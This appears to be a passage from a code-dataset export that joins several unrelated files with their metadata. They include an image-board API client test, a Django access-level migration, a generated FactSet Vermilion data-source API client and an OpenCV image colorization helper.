zUtMzAuODEtMy41MzYtNy41NzctNy44My00MC43ODUgMjkuMjk0LTQ0LjMyeiIgZmlsbD0iIzRDNkRDMiIvPjxwYXRoIGQ9Ik01Ni4xNiAyOC4wNDRjMTcuMzQ0LTEzLjIyIDU2LjI1OC0yOS4yMDUgNjMuMDYzIDMuODQ3IDIuNTIgMTIuMjQ4LjIyNSAxMy43Ni02LjE4OCAxNy45MS03Ljc5IDUuMDQ1LTE3LjM4Ni0xLjM3LTE1LjA1LTYuNjYyLTguNjUyIDcuNzA3LTE1LjQ4NCAxMC42MjQtMjMuMTIgOS44NS05LjE2Ny0uOTI3LTYuNDM3LTYuNzYtMi40MTctOS44NzIgMi40MzctMS44ODcgNS4wOC0zLjU3IDkuNDM2LTUuNzYtNy45NDIgMi41NS0xMy45OTIgMS45NzQtMTkuMjgyLTMuMzRsLTEwLjk0NyA1LjU1LjAxNSAxMS41NDJDNTMuMyA2NC4xNyA2Mi43NTggODAuODEgNjMuOTEyIDkzLjQyYy43MiA3Ljg3Ni01LjUzMiA2LjYzNy04LjY1IDEuNDI1IDEuODQ3IDUuNTgyIDMuNTkyIDkuODkyIDMuNDgzIDE1Ljg5LS4xMyA3LjE3OC04LjM4NiAxMS41NC0xMi4wNDcgMS4wOTgtNy41MDUtMjEuNDA1LTEyLjk2NS01MS45Ny0uOTczLTc1LjN6IiBmaWxsPSIjNEI2Qjc1Ii8+PHBhdGggZD0iTTQzLjI2NyAxMDcuMzI0cy02LjgyNS0xNC4xMzctNy42NC0zMC4xNjZjLS44MTctMTYuMDMtNC4xOTctMzEuNDY4LTEwLjU1LTQwLjY4OC02LjM1NC05LjIyLTEzLjI3Mi05LjczLTExLjk5Ny0zLjk4MiAxLjI3NSA1Ljc0OCAxMS4xMjMgMzMuMDE2IDEyLjEyOCAzNS45NTRDMjMuMDQyIDY1LjY0OCA3LjAzOCA0MS4xMS0uNDMgMzcuMjIyYy03LjQ3LTMuODg2LTguOTYuMzQ2LTYuODkyIDUuODg1IDIuMDY4IDUuNTQgMTguNTA3IDMwLjg0NCAyMC44ODYgMzMuNTAyLTIuNzM4LTEuNjg1LTEyLjI1Ni05LjAzNi0xNi45OTctOC45OTYtNC43NDIuMDQtNC45MSA1LjM2Ni0yLjYxNyA4LjUyNiAyLjI5MiAzLjE2MiAyMC45MTIgMTkuMTczIDI1LjE1IDIwLjk0NS01LjM1LjI4LTEwLjM4NCAxLjk5Ni05LjE4NiA2LjAwNCAxLjIgNC4wMDYgMTEuMzg0IDE0LjA2MyAyOC41MyAxMi4zNzcgMi41NzYtMi44MzQgNC44MjMtOC4xNDMgNC44MjMtOC4xNDN6IiBmaWxsPSIjNEM2REMyIi8+PHBhdGggZD0iTTY0LjM0MiAzNS41N3MzLjI4My04LjA4LTcuMzI0LTE5LjMxOGMtMS43NjgtMS43NjgtMy4wMy0yLjI3My00LjY3Mi0uNzU4LTEuNjQgMS41MTUtMTcuMDQ2IDE2LjAzNi4yNTMgMzguMjYuNTA0LTIuNCAxLjEzNS05LjU5NyAxLjEzNS05LjU5N3oiIGZpbGw9IiM0QzZEQzIiLz48L3N2Zz4=', body='Best pony in all her glory. Oh, and Applejack is there too. \r\nHappy Birthday Ashleigh Ball!', id=8905979, created_at=datetime.datetime(2020, 4, 1, 14, 48, 11, tzinfo=datetime.timezone.utc), image_id=2311224, edit_reason=None, edited_at=None, updated_at=datetime.datetime(2020, 4, 1, 14, 48, 11, tzinfo=datetime.timezone.utc), user_id=None), Comment(author='Slytherin-Rui', avatar='https://derpicdn.net/avatars/2016/6/18/674933f753fa6a39ed3b7dc.jpg', body='"@UserAccount":/images/2309849#comment_8905336\r\n"Rainbow is hot and Starlight is one of the best ponies."\r\nTotally agree with you there, except for Rainbow. AJ and RD are the only ponies of the mane 6 that I don\'t find sexually appealing, while the rest are freaking hot as hell. Especially Twilight and Fluttershy.', id=8905820, created_at=datetime.datetime(2020, 4, 1, 12, 44, 33, tzinfo=datetime.timezone.utc), image_id=2309849, edit_reason=None, edited_at=datetime.datetime(2020, 4, 1, 12, 45, 3, tzinfo=datetime.timezone.utc), updated_at=datetime.datetime(2020, 4, 1, 12, 45, 3, tzinfo=datetime.timezone.utc), user_id=380341), Comment(author='Azerdoe', avatar='https://derpicdn.net/avatars/2014/07/12/00_53_04_746_02.jpg', body='Best pony in all her glory. Oh, and Rainbow Dash is there too.\r\nHappy Birthday Ashleigh Ball!', id=8905556, created_at=datetime.datetime(2020, 4, 1, 8, 35, 42, tzinfo=datetime.timezone.utc), image_id=2311224, edit_reason=None, edited_at=None, updated_at=datetime.datetime(2020, 4, 1, 8, 35, 42, tzinfo=datetime.timezone.utc), user_id=296207)]
self.assertEqual(cls, expected)
# end def
def test_gallery(self):
gallery = Gallery.from_dict({
"description": "Best. Pony.",
"id": 4810,
"spoiler_warning": "",
"thumbnail_id": 1484633,
"title": "Best Pony",
"user": "Ciaran",
"user_id": 370912
})
expected = Gallery(description='Best. Pony.', id=4810, spoiler_warning='', thumbnail_id=1484633, title='Best Pony', user='Ciaran', user_id=370912)
self.assertEqual(gallery, expected)
# end def
def test_forum(self):
forum = Forum.from_dict({"description":"Discuss art of any form, and share techniques and tips","name":"Art Chat","post_count":55603,"short_name":"art","topic_count":1737})
expected = Forum(name='Art Chat', short_name='art', description='Discuss art of any form, and share techniques and tips', topic_count=1737, post_count=55603)
self.assertEqual(forum, expected)
# end def
def test_topic(self):
cls = Topic.from_dict({'topic': {'author': 'dracone', 'last_replied_to_at': '2020-03-22T20:20:02Z', 'locked': False, 'post_count': 3, 'slug': 'a-lack-of-images', 'sticky': False, 'title': 'A lack of images', 'user_id': 363222, 'view_count': 0}}['topic'])
expected = Topic(slug='a-lack-of-images', title='A lack of images', post_count=3, view_count=0, sticky=False, last_replied_to_at=datetime.datetime(2020, 3, 22, 20, 20, 2, tzinfo=datetime.timezone.utc), locked=False, user_id=363222, author='dracone')
self.assertEqual(cls, expected)
# end def
def est_cls(self):
cls = Cls.from_dict({}['cls'])
expected = Cls()
self.assertEqual(cls, expected)
# end def
if __name__ == '__main__':
unittest.main()
| 181.486542
| 30,765
| 0.824637
| 7,300
| 87,658
| 9.794247
| 0.14
| 0.007273
| 0.015357
| 0.021329
| 0.891661
| 0.876136
| 0.859283
| 0.837716
| 0.826806
| 0.822415
| 0
| 0.147931
| 0.088172
| 87,658
| 482
| 30,766
| 181.863071
| 0.746588
| 0.004826
| 0
| 0.184416
| 0
| 0.124675
| 0.547476
| 0.293301
| 0
| 1
| 0
| 0
| 0.176623
| 1
| 0.098701
| false
| 0
| 0.018182
| 0
| 0.132468
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
2d33f59e02c3b3ba1285f6c46055455e6bcb65d7
| 5,264
|
py
|
Python
|
daiquiri/metadata/migrations/0023_python3.py
|
agy-why/daiquiri
|
4d3e2ce51e202d5a8f1df404a0094a4e018dcb4d
|
[
"Apache-2.0"
] | 14
|
2018-12-23T18:35:02.000Z
|
2021-12-15T04:55:12.000Z
|
daiquiri/metadata/migrations/0023_python3.py
|
agy-why/daiquiri
|
4d3e2ce51e202d5a8f1df404a0094a4e018dcb4d
|
[
"Apache-2.0"
] | 40
|
2018-12-20T12:44:05.000Z
|
2022-03-21T11:35:20.000Z
|
daiquiri/metadata/migrations/0023_python3.py
|
agy-why/daiquiri
|
4d3e2ce51e202d5a8f1df404a0094a4e018dcb4d
|
[
"Apache-2.0"
] | 5
|
2019-05-16T08:03:35.000Z
|
2021-08-23T20:03:11.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.16 on 2018-10-22 08:58
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('daiquiri_metadata', '0022_table_size'),
]
operations = [
migrations.AlterField(
model_name='column',
name='access_level',
field=models.CharField(choices=[('PRIVATE', 'Private - access must be granted by group'), ('INTERNAL', 'Internal - logged in users can access'), ('PUBLIC', 'Public - anonymous visitors can access')], max_length=8, verbose_name='Access level'),
),
migrations.AlterField(
model_name='column',
name='index_for',
field=models.CharField(blank=True, default='', help_text='The columns which this column is an index for (e.g. for pgSphere).', max_length=256, verbose_name='Index for'),
),
migrations.AlterField(
model_name='column',
name='metadata_access_level',
field=models.CharField(choices=[('PRIVATE', 'Private - access must be granted by group'), ('INTERNAL', 'Internal - logged in users can access'), ('PUBLIC', 'Public - anonymous visitors can access')], max_length=8, verbose_name='Metadata access level'),
),
migrations.AlterField(
model_name='function',
name='access_level',
field=models.CharField(choices=[('PRIVATE', 'Private - access must be granted by group'), ('INTERNAL', 'Internal - logged in users can access'), ('PUBLIC', 'Public - anonymous visitors can access')], max_length=8, verbose_name='Access level'),
),
migrations.AlterField(
model_name='function',
name='metadata_access_level',
field=models.CharField(choices=[('PRIVATE', 'Private - access must be granted by group'), ('INTERNAL', 'Internal - logged in users can access'), ('PUBLIC', 'Public - anonymous visitors can access')], max_length=8, verbose_name='Metadata access level'),
),
migrations.AlterField(
model_name='schema',
name='access_level',
field=models.CharField(choices=[('PRIVATE', 'Private - access must be granted by group'), ('INTERNAL', 'Internal - logged in users can access'), ('PUBLIC', 'Public - anonymous visitors can access')], max_length=8, verbose_name='Access level'),
),
migrations.AlterField(
model_name='schema',
name='license',
field=models.CharField(blank=True, choices=[('CC0', 'CC0 1.0 Universal (CC0 1.0)'), ('PD', 'Public Domain Mark'), ('BY', 'Attribution 4.0 International (CC BY 4.0)'), ('BY_SA', 'Attribution-ShareAlike 4.0 International (CC BY-SA 4.0)'), ('BY_ND', 'Attribution-NoDerivatives 4.0 International (CC BY-ND 4.0)'), ('BY_NC', 'Attribution-NonCommercial 4.0 International (CC BY-NC 4.0)'), ('BY_NC_SA', 'Attribution-NonCommercial-ShareAlike 4.0 International (CC BY-NC-SA 4.0)'), ('BY_NC_ND', 'Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0)')], max_length=8, null=True, verbose_name='License'),
),
migrations.AlterField(
model_name='schema',
name='metadata_access_level',
field=models.CharField(choices=[('PRIVATE', 'Private - access must be granted by group'), ('INTERNAL', 'Internal - logged in users can access'), ('PUBLIC', 'Public - anonymous visitors can access')], max_length=8, verbose_name='Metadata access level'),
),
migrations.AlterField(
model_name='table',
name='access_level',
field=models.CharField(choices=[('PRIVATE', 'Private - access must be granted by group'), ('INTERNAL', 'Internal - logged in users can access'), ('PUBLIC', 'Public - anonymous visitors can access')], max_length=8, verbose_name='Access level'),
),
migrations.AlterField(
model_name='table',
name='license',
field=models.CharField(blank=True, choices=[('CC0', 'CC0 1.0 Universal (CC0 1.0)'), ('PD', 'Public Domain Mark'), ('BY', 'Attribution 4.0 International (CC BY 4.0)'), ('BY_SA', 'Attribution-ShareAlike 4.0 International (CC BY-SA 4.0)'), ('BY_ND', 'Attribution-NoDerivatives 4.0 International (CC BY-ND 4.0)'), ('BY_NC', 'Attribution-NonCommercial 4.0 International (CC BY-NC 4.0)'), ('BY_NC_SA', 'Attribution-NonCommercial-ShareAlike 4.0 International (CC BY-NC-SA 4.0)'), ('BY_NC_ND', 'Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0)')], max_length=8, null=True, verbose_name='License'),
),
migrations.AlterField(
model_name='table',
name='metadata_access_level',
field=models.CharField(choices=[('PRIVATE', 'Private - access must be granted by group'), ('INTERNAL', 'Internal - logged in users can access'), ('PUBLIC', 'Public - anonymous visitors can access')], max_length=8, verbose_name='Metadata access level'),
),
migrations.AlterField(
model_name='table',
name='type',
field=models.CharField(choices=[('table', 'Table'), ('view', 'View')], max_length=8, verbose_name='Type of table'),
),
]
| 69.263158
| 628
| 0.640767
| 640
| 5,264
| 5.157813
| 0.151563
| 0.014541
| 0.090882
| 0.105423
| 0.891245
| 0.876098
| 0.848531
| 0.848531
| 0.838534
| 0.838534
| 0
| 0.02349
| 0.207447
| 5,264
| 75
| 629
| 70.186667
| 0.767737
| 0.013108
| 0
| 0.823529
| 1
| 0
| 0.480547
| 0.072804
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.029412
| 0
| 0.073529
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
77872972b56f053eef7a82c2d45f242da89b2f8c
| 129
|
py
|
Python
|
rough_surfaces/__init__.py
|
SourangshuGhosh/Damage-Mechanics
|
579a0d7ed01853f1039329b9a8e030e82d79ba97
|
[
"MIT"
] | 14
|
2016-08-04T06:49:58.000Z
|
2021-11-23T09:36:26.000Z
|
rough_surfaces/__init__.py
|
raincoder87/rough_surfaces
|
bc2f07a367f9b53e04fd2f6049f10f6b3e2d9a03
|
[
"MIT"
] | 6
|
2017-10-04T08:48:48.000Z
|
2021-11-19T23:47:41.000Z
|
rough_surfaces/__init__.py
|
raincoder87/rough_surfaces
|
bc2f07a367f9b53e04fd2f6049f10f6b3e2d9a03
|
[
"MIT"
] | 7
|
2016-08-04T06:50:10.000Z
|
2021-03-24T08:02:24.000Z
|
from . import analyse
from . import generate
from . import params
from . import contact
from . import surface
from . import plot
| 18.428571
| 22
| 0.767442
| 18
| 129
| 5.5
| 0.444444
| 0.606061
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.186047
| 129
| 6
| 23
| 21.5
| 0.942857
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
77b0ff281585a4583c76a08dc7594cd0c7040b09
| 18,708
|
py
|
Python
|
code/python/Vermilion/v1/fds/sdk/Vermilion/api/datasource_api.py
|
factset/enterprise-sdk
|
3fd4d1360756c515c9737a0c9a992c7451d7de7e
|
[
"Apache-2.0"
] | 6
|
2022-02-07T16:34:18.000Z
|
2022-03-30T08:04:57.000Z
|
code/python/Vermilion/v1/fds/sdk/Vermilion/api/datasource_api.py
|
factset/enterprise-sdk
|
3fd4d1360756c515c9737a0c9a992c7451d7de7e
|
[
"Apache-2.0"
] | 2
|
2022-02-07T05:25:57.000Z
|
2022-03-07T14:18:04.000Z
|
code/python/Vermilion/v1/fds/sdk/Vermilion/api/datasource_api.py
|
factset/enterprise-sdk
|
3fd4d1360756c515c9737a0c9a992c7451d7de7e
|
[
"Apache-2.0"
] | null | null | null |
"""
VRS API documentation
Documentation on all available end points in the VRSAPI # noqa: E501
The version of the OpenAPI document: v1
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from fds.sdk.Vermilion.api_client import ApiClient, Endpoint as _Endpoint
from fds.sdk.Vermilion.model_utils import ( # noqa: F401
check_allowed_values,
check_validations,
date,
datetime,
file_type,
none_type,
validate_and_convert_types
)
from fds.sdk.Vermilion.model.data_source_data import DataSourceData
from fds.sdk.Vermilion.model.data_source_data_instance import DataSourceDataInstance
from fds.sdk.Vermilion.model.data_source_list import DataSourceList
from fds.sdk.Vermilion.model.inline_response400 import InlineResponse400
from fds.sdk.Vermilion.model.inline_response401 import InlineResponse401
from fds.sdk.Vermilion.model.inline_response403 import InlineResponse403
from fds.sdk.Vermilion.model.inline_response404 import InlineResponse404
from fds.sdk.Vermilion.model.inline_response406 import InlineResponse406
class DatasourceApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
self.v1_tenant_data_sources_data_source_code_data_get_endpoint = _Endpoint(
settings={
'response_type': ([DataSourceDataInstance],),
'auth': [
'FactSetApiKey',
'FactSetOAuth2'
],
'endpoint_path': '/v1/{tenant}/data-sources/{dataSourceCode}/data',
'operation_id': 'v1_tenant_data_sources_data_source_code_data_get',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'tenant',
'data_source_code',
'entity_codes',
'entity_keys',
],
'required': [
'tenant',
'data_source_code',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'tenant':
(str,),
'data_source_code':
(str,),
'entity_codes':
(str,),
'entity_keys':
(str,),
},
'attribute_map': {
'tenant': 'tenant',
'data_source_code': 'dataSourceCode',
'entity_codes': 'entityCodes',
'entity_keys': 'entityKeys',
},
'location_map': {
'tenant': 'path',
'data_source_code': 'path',
'entity_codes': 'query',
'entity_keys': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client
)
self.v1_tenant_data_sources_data_source_code_get_endpoint = _Endpoint(
settings={
'response_type': (DataSourceData,),
'auth': [
'FactSetApiKey',
'FactSetOAuth2'
],
'endpoint_path': '/v1/{tenant}/data-sources/{dataSourceCode}',
'operation_id': 'v1_tenant_data_sources_data_source_code_get',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'tenant',
'data_source_code',
],
'required': [
'tenant',
'data_source_code',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'tenant':
(str,),
'data_source_code':
(str,),
},
'attribute_map': {
'tenant': 'tenant',
'data_source_code': 'dataSourceCode',
},
'location_map': {
'tenant': 'path',
'data_source_code': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client
)
self.v1_tenant_data_sources_get_endpoint = _Endpoint(
settings={
'response_type': (DataSourceList,),
'auth': [
'FactSetApiKey',
'FactSetOAuth2'
],
'endpoint_path': '/v1/{tenant}/data-sources',
'operation_id': 'v1_tenant_data_sources_get',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'tenant',
'sort',
'pagination_limit',
'pagination_offset',
],
'required': [
'tenant',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'tenant':
(str,),
'sort':
(str,),
'pagination_limit':
(int,),
'pagination_offset':
(int,),
},
'attribute_map': {
'tenant': 'tenant',
'sort': '_sort',
'pagination_limit': '_paginationLimit',
'pagination_offset': '_paginationOffset',
},
'location_map': {
'tenant': 'path',
'sort': 'query',
'pagination_limit': 'query',
'pagination_offset': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client
)
def v1_tenant_data_sources_data_source_code_data_get(
self,
tenant,
data_source_code,
**kwargs
):
"""Gets the data for the datasource # noqa: E501
Gets the data for the datasource. There are optional query parameters to filter the da # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_tenant_data_sources_data_source_code_data_get(tenant, data_source_code, async_req=True)
>>> result = thread.get()
Args:
tenant (str): The code of the tenancy
data_source_code (str): The code of the datasource
Keyword Args:
entity_codes (str): A series of query parameter used to filter the data for a datasource. This represents the entities for the datasource. E.g.: entityCodes=ACCOUNT&entityCodes=FUNDS. [optional]
entity_keys (str): A series of query parameter used to filter the data for a datasource. This is the entity key value for an entity selection. E.g.: entityKeys=1&entityKeys=Test2. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
[DataSourceDataInstance]
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_spec_property_naming'] = kwargs.get(
'_spec_property_naming', False
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['tenant'] = \
tenant
kwargs['data_source_code'] = \
data_source_code
return self.v1_tenant_data_sources_data_source_code_data_get_endpoint.call_with_http_info(**kwargs)
def v1_tenant_data_sources_data_source_code_get(
self,
tenant,
data_source_code,
**kwargs
):
"""Gets a datasource # noqa: E501
Gets a datasource based on the code passed # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_tenant_data_sources_data_source_code_get(tenant, data_source_code, async_req=True)
>>> result = thread.get()
Args:
tenant (str): The code of the tenancy
data_source_code (str): The code of the datasource
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
DataSourceData
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_spec_property_naming'] = kwargs.get(
'_spec_property_naming', False
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['tenant'] = \
tenant
kwargs['data_source_code'] = \
data_source_code
return self.v1_tenant_data_sources_data_source_code_get_endpoint.call_with_http_info(**kwargs)
def v1_tenant_data_sources_get(
self,
tenant,
**kwargs
):
"""Lists all datasources # noqa: E501
List all datasources the user has permission to see # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_tenant_data_sources_get(tenant, async_req=True)
>>> result = thread.get()
Args:
tenant (str): The code of the tenancy
Keyword Args:
sort (str): The column to sort on. Append - to sort in descending order. If parameter is not given, no sorting will be done. [optional]
pagination_limit (int): Non-negative maximum number of entries to return. Default is 25. [optional]
pagination_offset (int): Non-negative number of entries to skip. Default is 0. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
DataSourceList
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_spec_property_naming'] = kwargs.get(
'_spec_property_naming', False
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['tenant'] = \
tenant
return self.v1_tenant_data_sources_get_endpoint.call_with_http_info(**kwargs)
| 38.493827
| 206
| 0.526032
| 1,834
| 18,708
| 5.115049
| 0.141767
| 0.035177
| 0.044771
| 0.036457
| 0.801301
| 0.798103
| 0.763991
| 0.753225
| 0.727428
| 0.695022
| 0
| 0.007926
| 0.39304
| 18,708
| 485
| 207
| 38.573196
| 0.81823
| 0.372728
| 0
| 0.625
| 1
| 0
| 0.233989
| 0.051685
| 0
| 0
| 0
| 0
| 0
| 1
| 0.0125
| false
| 0
| 0.0375
| 0
| 0.0625
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
77eae25719ab65656ce734a3c195ad7edd6fa5bd
| 2,364
|
py
|
Python
|
helper.py
|
RashadGarayev/ColorizeImage
|
a4364c5be300d6d2dce3bdc32037333640eeeb75
|
[
"MIT"
] | null | null | null |
helper.py
|
RashadGarayev/ColorizeImage
|
a4364c5be300d6d2dce3bdc32037333640eeeb75
|
[
"MIT"
] | null | null | null |
helper.py
|
RashadGarayev/ColorizeImage
|
a4364c5be300d6d2dce3bdc32037333640eeeb75
|
[
"MIT"
] | null | null | null |
import numpy as np
import cv2
def Image(arg):
net = cv2.dnn.readNetFromCaffe('models/colorization_deploy_v2.prototxt',
'models/colorization_release_v2.caffemodel')
pts = np.load('models/pts_in_hull.npy')
class8 = net.getLayerId("class8_ab")
conv8 = net.getLayerId("conv8_313_rh")
pts = pts.transpose().reshape(2, 313, 1, 1)
net.getLayer(class8).blobs = [pts.astype("float32")]
net.getLayer(conv8).blobs = [np.full([1, 313], 2.606, dtype="float32")]
image = cv2.imread(arg)
scaled = image.astype(np.float32) / 255.0
lab = cv2.cvtColor(scaled, cv2.COLOR_BGR2LAB)
resized = cv2.resize(lab, (224, 224))
L = cv2.split(resized)[0]
L -= 50
net.setInput(cv2.dnn.blobFromImage(L))
ab = net.forward()[0, :, :, :].transpose((1, 2, 0))
ab = cv2.resize(ab, (image.shape[1], image.shape[0]))
L = cv2.split(lab)[0]
colorized = np.concatenate((L[:, :, np.newaxis], ab), axis=2)
colorized = cv2.cvtColor(colorized, cv2.COLOR_LAB2BGR)
colorized = np.clip(colorized, 0, 1)
colorized = (255 * colorized).astype("uint8")
colorized = cv2.resize(colorized, (281,281))
colorized = cv2.imwrite(r'tmp/colorized.jpg', colorized)
def ColorizeVideo(frame):
net = cv2.dnn.readNetFromCaffe('models/colorization_deploy_v2.prototxt',
'models/colorization_release_v2.caffemodel')
pts = np.load('models/pts_in_hull.npy')
class8 = net.getLayerId("class8_ab")
conv8 = net.getLayerId("conv8_313_rh")
pts = pts.transpose().reshape(2, 313, 1, 1)
net.getLayer(class8).blobs = [pts.astype("float32")]
net.getLayer(conv8).blobs = [np.full([1, 313], 2.606, dtype="float32")]
frame = cv2.resize(frame, (400, 400))
scaled = frame.astype("float32") / 255.0
lab = cv2.cvtColor(scaled, cv2.COLOR_BGR2LAB)
resized = cv2.resize(lab, (224, 224))
L = cv2.split(resized)[0]
L -= 50
net.setInput(cv2.dnn.blobFromImage(L))
ab = net.forward()[0, :, :, :].transpose((1, 2, 0))
ab = cv2.resize(ab, (frame.shape[1], frame.shape[0]))
L = cv2.split(lab)[0]
colorized = np.concatenate((L[:, :, np.newaxis], ab), axis=2)
colorized = cv2.cvtColor(colorized, cv2.COLOR_LAB2BGR)
colorized = np.clip(colorized, 0, 1)
colorized = (255 * colorized).astype("uint8")
return colorized
| 43.777778
| 79
| 0.635364
| 323
| 2,364
| 4.582043
| 0.229102
| 0.036486
| 0.024324
| 0.033784
| 0.825676
| 0.825676
| 0.825676
| 0.825676
| 0.825676
| 0.825676
| 0
| 0.082113
| 0.191201
| 2,364
| 54
| 80
| 43.777778
| 0.691946
| 0
| 0
| 0.745098
| 0
| 0
| 0.129387
| 0.085412
| 0
| 0
| 0
| 0
| 0
| 1
| 0.039216
| false
| 0
| 0.039216
